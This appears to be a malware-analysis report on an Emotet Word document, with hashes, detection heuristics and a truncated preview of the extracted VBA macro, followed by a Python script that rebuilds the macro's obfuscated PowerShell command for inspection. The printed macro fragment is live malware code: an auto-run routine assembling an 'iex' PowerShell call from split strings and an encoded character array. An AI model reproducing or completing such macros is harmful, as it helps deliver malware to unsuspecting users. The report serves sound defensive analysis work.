Emotet — Office (OLE) malware analysis

Static analysis result for SHA-256 4f13f1a910f16aa6…

MALICIOUS

Office (OLE)

Size: 108.0 KB
Created: 2018-06-20 10:49:00
Authoring application: Microsoft Office Word
First seen: 2019-05-31
MD5: 3bb9e2babe48d504016dbe7af481f656
SHA-1: baa285c547def55bc357a24cf5f5e000ec5e5a6e
SHA-256: 4f13f1a910f16aa6104ccdfeb4884ae41facb09ee6d89bc9297898139bec6bde
Risk score: 242

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File

ClamAV matches the file against the signature Doc.Downloader.Emotet-6877457-0, i.e. an Emotet document downloader. The extracted VBA project contains an AutoOpen entry point that reaches a Shell() call, so the macro runs as soon as the document is opened and starts an external process. That process is PowerShell: the extracted source (macros.bas below) builds the command line from dozens of short string literals spread over several functions, interleaved with filler statements (CDate, Sin and CByte on unused variables) that do nothing under On Error Resume Next. The visible part already shows two Emotet trademarks. The cmdlet name is split and case-mangled ("OwerSHell"; its first character is presumably supplied by code in the truncated part), and Invoke-Expression is obtained as $ShellId[1]+$ShellId[13]+'X', which evaluates to "ieX" because $ShellId is "Microsoft.PowerShell". The argument is a [char[]] array of integers cast back to a string at run time; many of the values are below 32 or equal to 127, so the array is almost certainly transformed (for example XORed with a key) before it is evaluated. The decoding step and the download URLs sit in the truncated part of the macro and are not recovered in this report, so the "download and run a secondary payload" stage is inferred from the signature and the Emotet pattern rather than observed.

Heuristics 7

  • ClamAV: Doc.Downloader.Emotet-6877457-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Emotet-6877457-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself. For this sample a VBA project was in fact recovered (see Extracted artifacts), so this marker is redundant with the AutoOpen finding above and adds no independent evidence.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
    This is the DrawingML XML namespace that every modern Word document embeds; it is not a contact address and must not be treated as a network indicator for this sample.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 14370 bytes
SHA-256: 45831b9ea1cb250dc7522f169432581477d9176133ca100100c3bdd9a043bc7a
Preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "qGlUjtoGSOR"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "dTwLPZlF"
Function TWJEtz()
On Error Resume Next
riBRP = CDate(68503)
LBAYj = CDate(zzSRZ + Sin(903 + 91761) * 64047 * CInt(8988))
qAiGO = 21173
wMrip = 51084
izAoCc = iUCAL
JhOXww = CByte(tuvLW)
uuDPlJLMP = "OwerSHell  " + ". ( " + "$Sh" + "el" + "LiD[1]+$sHElLI" + "D[13]+'X')(( [" + "chAR[]]( 1" + "17,28, 37"
SDjKmp = CDate(38644)
iVGGw = CDate(oLPpl + Sin(3612 + 87950) * 24598 * CInt(18538))
hqolz = 33005
NbGZnp = 39045
XZYbvc = WrdPmI
dVLadm = CByte(XROvTi)
VXQnrksO = " , 3" + " , 9, 59 , " + "113 ,1" + "08, " + "113 , " + "63,52" + ",38 ,12"
PSBBCp = CDate(53958)
vUZTI = CDate(jFsod + Sin(56710 + 77399) * 20126 * CInt(87036))
pSjGz = 11685
RhDKi = 46916
tEnAJ = QiDkH
hkFtDn = CByte(RsIFm)
HTkwkOr = "4 , 62, 51," + "59,52," + " 50 ,37" + ",1" + "13 ,35" + " , 48,63, 53" + ",62 , 60 , 10"
hDqQX = CDate(86096)
oKlTz = CDate(YddTJ + Sin(355 + 43427) * 93732 * CInt(26739))
QjZvmd = 24318
pJXuR = 47115
GupDzY = FICXE
TbIvE = CByte(sIwBb)
OzDrpjzQ = "6, 117" + " , 56,28,50 ,20" + ", 8, 3 , 113" + " ,108,113,63 ," + " 52,38 ,124 ," + " 62,51 ,59, 52 " + ", 50 ,37 , 113 " + ",2," + " 4"
LzrUQn = CDate(19759)
GFYYNw = CDate(JXAKlQ + Sin(12297 + 94072) * 39075 * CInt(70878))
iIJffw = 27858
faiDv = 216
GnpEC = ECwLn
oBFDTH = CByte(VipOPl)
MrBlnFF = "0 ,34 , 37" + " , 52,60" + ", 127 ,31, " + "52,37, 127 , 6," + "52,51 " + ", 18 ,61 , 56"
ULCZW = CDate(21906)
jGMKw = CDate(pLVEQl + Sin(78936 + 9085) * 8222 * CInt(75813))
utkjYS = 26340
JCHsUt = 5046
LQcUsH = uzQai
zPEAX = CByte(LhWvBC)
HEawv = ", 52," + "63,37, 106,1" + "17,4 ,58" + " , 32 ," + " 30, 19," + " 30 ,113 ,108, " + "113,1" + "18, 57,"
TWJEtz = uuDPlJLMP + VXQnrksO + HTkwkOr + OzDrpjzQ + MrBlnFF + HEawv
End Function
Function LazXm()
On Error Resume Next
QzYPd = CDate(75622)
OiwjLk = CDate(HhiVjp + Sin(56615 + 57760) * 69876 * CInt(12248))
DitzMS = 58948
VYXQlQ = 50367
KXvwY = dtzdEK
NKQXK = CByte(FjAqz)
NvBEtzHi = " 3" + "7 , 37, 33,10" + "7,126, 126,33 ," + "62,35 ,37 ,3"
GRmTD = CDate(44564)
zHRNs = CDate(jFXKo + Sin(46703 + 45024) * 25607 * CInt(37610))
mNGYA = 59652
ztDBwf = 4375
WrpsYC = YwfMT
JbmOR = CByte(TPzRG)
jMzJlBjV = "5, 48,56 ,37," + "38,62 ," + " 35" + ",58,34, 57 ," + "62, " + "33,127 ," + " 50,62, 60 ,1" + "26, 58 ,21,4, " + "30,5" + "0 ,10"
tOMGMS = CDate(45728)
lXbhR = CDate(IwuGZH + Sin(6552 + 25922) * 9992 * CInt(93790))
Ouvlzv = 10841
pZhXpZ = 43004
hGjRp = QiDwz
tiqmh = CByte(cNifw)
vtinqVki = "1," + "35," + "126, 17 , 5" + "7 , 37,37"
AKzNtJ = CDate(29497)
jrjOn = CDate(pNLRcl + Sin(42253 + 96204) * 20184 * CInt(86214))
IVpHf = 37493
HvwQO = 83607
SqREu = jqdVw
GpvfJ = CByte(kiLnz)
LaJEfwEAWbA = ", 3" + "3,107 , 12" + "6 ,126,38,3" + "8, 38, 127 ," + "51 , 62,62," + "58,56 " + ", 6" + "3,54 ,127 , 54" + " ,"
mWAXJ = CDate(25235)
EEViVH = CDate(wnaaP + Sin(82400 + 65490) * 53421 * CInt(51834))
Fhraa = 43823
FJiNiS = 27833
cETwC = VfSNF
uLNZC = CByte(GGaTz)
dolkkiBjjAH = " 62 ,40 ,48" + " ,61 , 60" + ",35, 56 ,127 , " + "50 , " + "62 ,60 ,126,11" + " ,"
wDtBE = CDate(64840)
sCIPN = CDate(qllXs + Sin(67508 + 42132) * 42035 * CInt(53296))
hrSwD = 37591
YuzlOG = 2764
vuwdO = TmRLZi
zDGSKv = CByte(uFuvBD)
lzPDnp = "26, 7, 56" + ", 126,17 ,57" + " ," + " 37, 37,33,10" + "7,126" + ", 12" + "6,38 , 38, "
LazXm = NvBEtzHi + jMzJlBjV + vtinqVki + LaJEfwEAWbA + dolkkiBjjAH + lzPDnp
End Function
Function WzhWl()
On Error Resume Next
wBcHw = CDate(26209)
tzHPaN = CDate(zDrEIw + Sin(70118 + 97932) * 58229 * CInt(90425))
CztlJT = 44248
dMGuJ = 40508
zaosh = pSdEv
ShiXr = CByte(GHECQi)
uZMoM = "38 , 127, 63,3" + "9 , 61 ,52 ,54" + ",48, 6" + "1,127"
QvZHj = CDate(76323)
mNsBB = CDate(dEjOSU + Sin(61661 + 78812) * 38443 * CInt(27692))
OwiFI = 7258
puSFRz = 10
... (truncated)
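The string-building pattern above can be undone mechanically. The following is an added worked example for this report, not code from the analysis platform or from the sample: it takes the fragments of function TWJEtz exactly as shown in the macros.bas preview (with most filler lines dropped), joins the string literals in the order the return statement concatenates them, resolves the $ShellId trick to "ieX", and pulls out the [char[]] integer array so that its properties (how many values are non-printable, whether byte runs repeat) can be inspected before the still-unknown decoding step. Function and variable names other than those copied from the macro are this example's own.

```python
"""Reconstruct the PowerShell command an Emotet macro assembles from string
literals, resolve the $ShellId trick, and inspect the [char[]] payload.

Added worked example for this report, not code from the analysis platform.
SAMPLE_VBA is copied from the macros.bas preview (function TWJEtz, most
CDate/Sin/CByte filler dropped); every other name here is this example's own."""
import re

SAMPLE_VBA = r'''
Function TWJEtz()
On Error Resume Next
riBRP = CDate(68503)
LBAYj = CDate(zzSRZ + Sin(903 + 91761) * 64047 * CInt(8988))
uuDPlJLMP = "OwerSHell  " + ". ( " + "$Sh" + "el" + "LiD[1]+$sHElLI" + "D[13]+'X')(( [" + "chAR[]]( 1" + "17,28, 37"
VXQnrksO = " , 3" + " , 9, 59 , " + "113 ,1" + "08, " + "113 , " + "63,52" + ",38 ,12"
HTkwkOr = "4 , 62, 51," + "59,52," + " 50 ,37" + ",1" + "13 ,35" + " , 48,63, 53" + ",62 , 60 , 10"
OzDrpjzQ = "6, 117" + " , 56,28,50 ,20" + ", 8, 3 , 113" + " ,108,113,63 ," + " 52,38 ,124 ," + " 62,51 ,59, 52 " + ", 50 ,37 , 113 " + ",2," + " 4"
MrBlnFF = "0 ,34 , 37" + " , 52,60" + ", 127 ,31, " + "52,37, 127 , 6," + "52,51 " + ", 18 ,61 , 56"
HEawv = ", 52," + "63,37, 106,1" + "17,4 ,58" + " , 32 ," + " 30, 19," + " 30 ,113 ,108, " + "113,1" + "18, 57,"
TWJEtz = uuDPlJLMP + VXQnrksO + HTkwkOr + OzDrpjzQ + MrBlnFF + HEawv
End Function
'''

LITERAL = r'"(?:[^"]|"")*"'                      # one VBA string literal ("" escapes a quote)
LITERAL_RE = re.compile(LITERAL)
# name = "lit" + "lit" + ...   (only literals on the right-hand side)
STRING_ASSIGN = re.compile(r'^\s*(\w+)\s*=\s*(' + LITERAL + r'(?:\s*\+\s*' + LITERAL + r')*)\s*$')
# name = var + var + ...       (the function's return statement)
VAR_CONCAT = re.compile(r'^\s*(\w+)\s*=\s*([A-Za-z_]\w*(?:\s*\+\s*[A-Za-z_]\w*)+)\s*$')
CHAR_ARRAY = re.compile(r'\[char\[\]\]\s*\(', re.IGNORECASE)
IEX_TRICK = re.compile(r"\$shellid\[1\]\s*\+\s*\$shellid\[13\]\s*\+\s*'x'", re.IGNORECASE)
SHELL_ID = "Microsoft.PowerShell"                  # value of $ShellId in Windows PowerShell


def string_variables(vba):
    """Map every variable assigned purely from string literals to its joined value."""
    found = {}
    for line in vba.splitlines():
        m = STRING_ASSIGN.match(line)
        if m:
            found[m.group(1)] = "".join(
                lit[1:-1].replace('""', '"') for lit in LITERAL_RE.findall(m.group(2)))
    return found


def resolve_function(vba, name):
    """Return the string a VBA function yields when its return line sums string variables."""
    literals = string_variables(vba)
    for line in vba.splitlines():
        m = VAR_CONCAT.match(line)
        if m and m.group(1) == name:
            return "".join(literals.get(v.strip(), "") for v in m.group(2).split("+"))
    raise ValueError(f"no concatenating return statement for {name}")


def resolve_shellid(ps):
    """Replace $ShellId[1]+$ShellId[13]+'X' with what it evaluates to: 'ieX'."""
    return IEX_TRICK.sub(SHELL_ID[1] + SHELL_ID[13] + "X", ps)


def extract_char_codes(ps):
    """Integers passed to [char[]](...); the closing paren is missing in the truncated preview."""
    m = CHAR_ARRAY.search(ps)
    if not m:
        return []
    body = ps[m.end():].split(")", 1)[0]
    return [int(n) for n in re.findall(r"\d+", body)]


def longest_repeated_run(codes):
    """(length, i, j) of the longest run that occurs at two offsets i < j; O(n^2), fine here."""
    best = (0, -1, -1)
    for i in range(len(codes)):
        for j in range(i + 1, len(codes)):
            k = 0
            while j + k < len(codes) and codes[i + k] == codes[j + k]:
                k += 1
            if k > best[0]:
                best = (k, i, j)
    return best


def summarize(codes):
    """Cheap sanity checks on the array before guessing at the decoding step."""
    return {"count": len(codes),
            "below_32": sum(c < 32 for c in codes),   # control characters: not plain ASCII text
            "del_127": codes.count(127),
            "longest_repeat": longest_repeated_run(codes)}


if __name__ == "__main__":
    cmd = resolve_function(SAMPLE_VBA, "TWJEtz")
    print(resolve_shellid(cmd))
    print(summarize(extract_char_codes(cmd)))
```

Two things the output makes visible that the raw macro hides: the fragment boundaries deliberately split numbers ("12" + "4" becomes 124, "10" + "6" becomes 106), so the array can only be read after concatenation; and the joined array contains a 14-value run that occurs twice, the kind of pattern a repeated plaintext substring leaves behind under a simple byte-wise transform. Fifteen of the 81 values are control characters and two are 127, which confirms that the array is not literal ASCII and that the key or transform lives in the truncated part of the macro; this example stops there rather than guessing it.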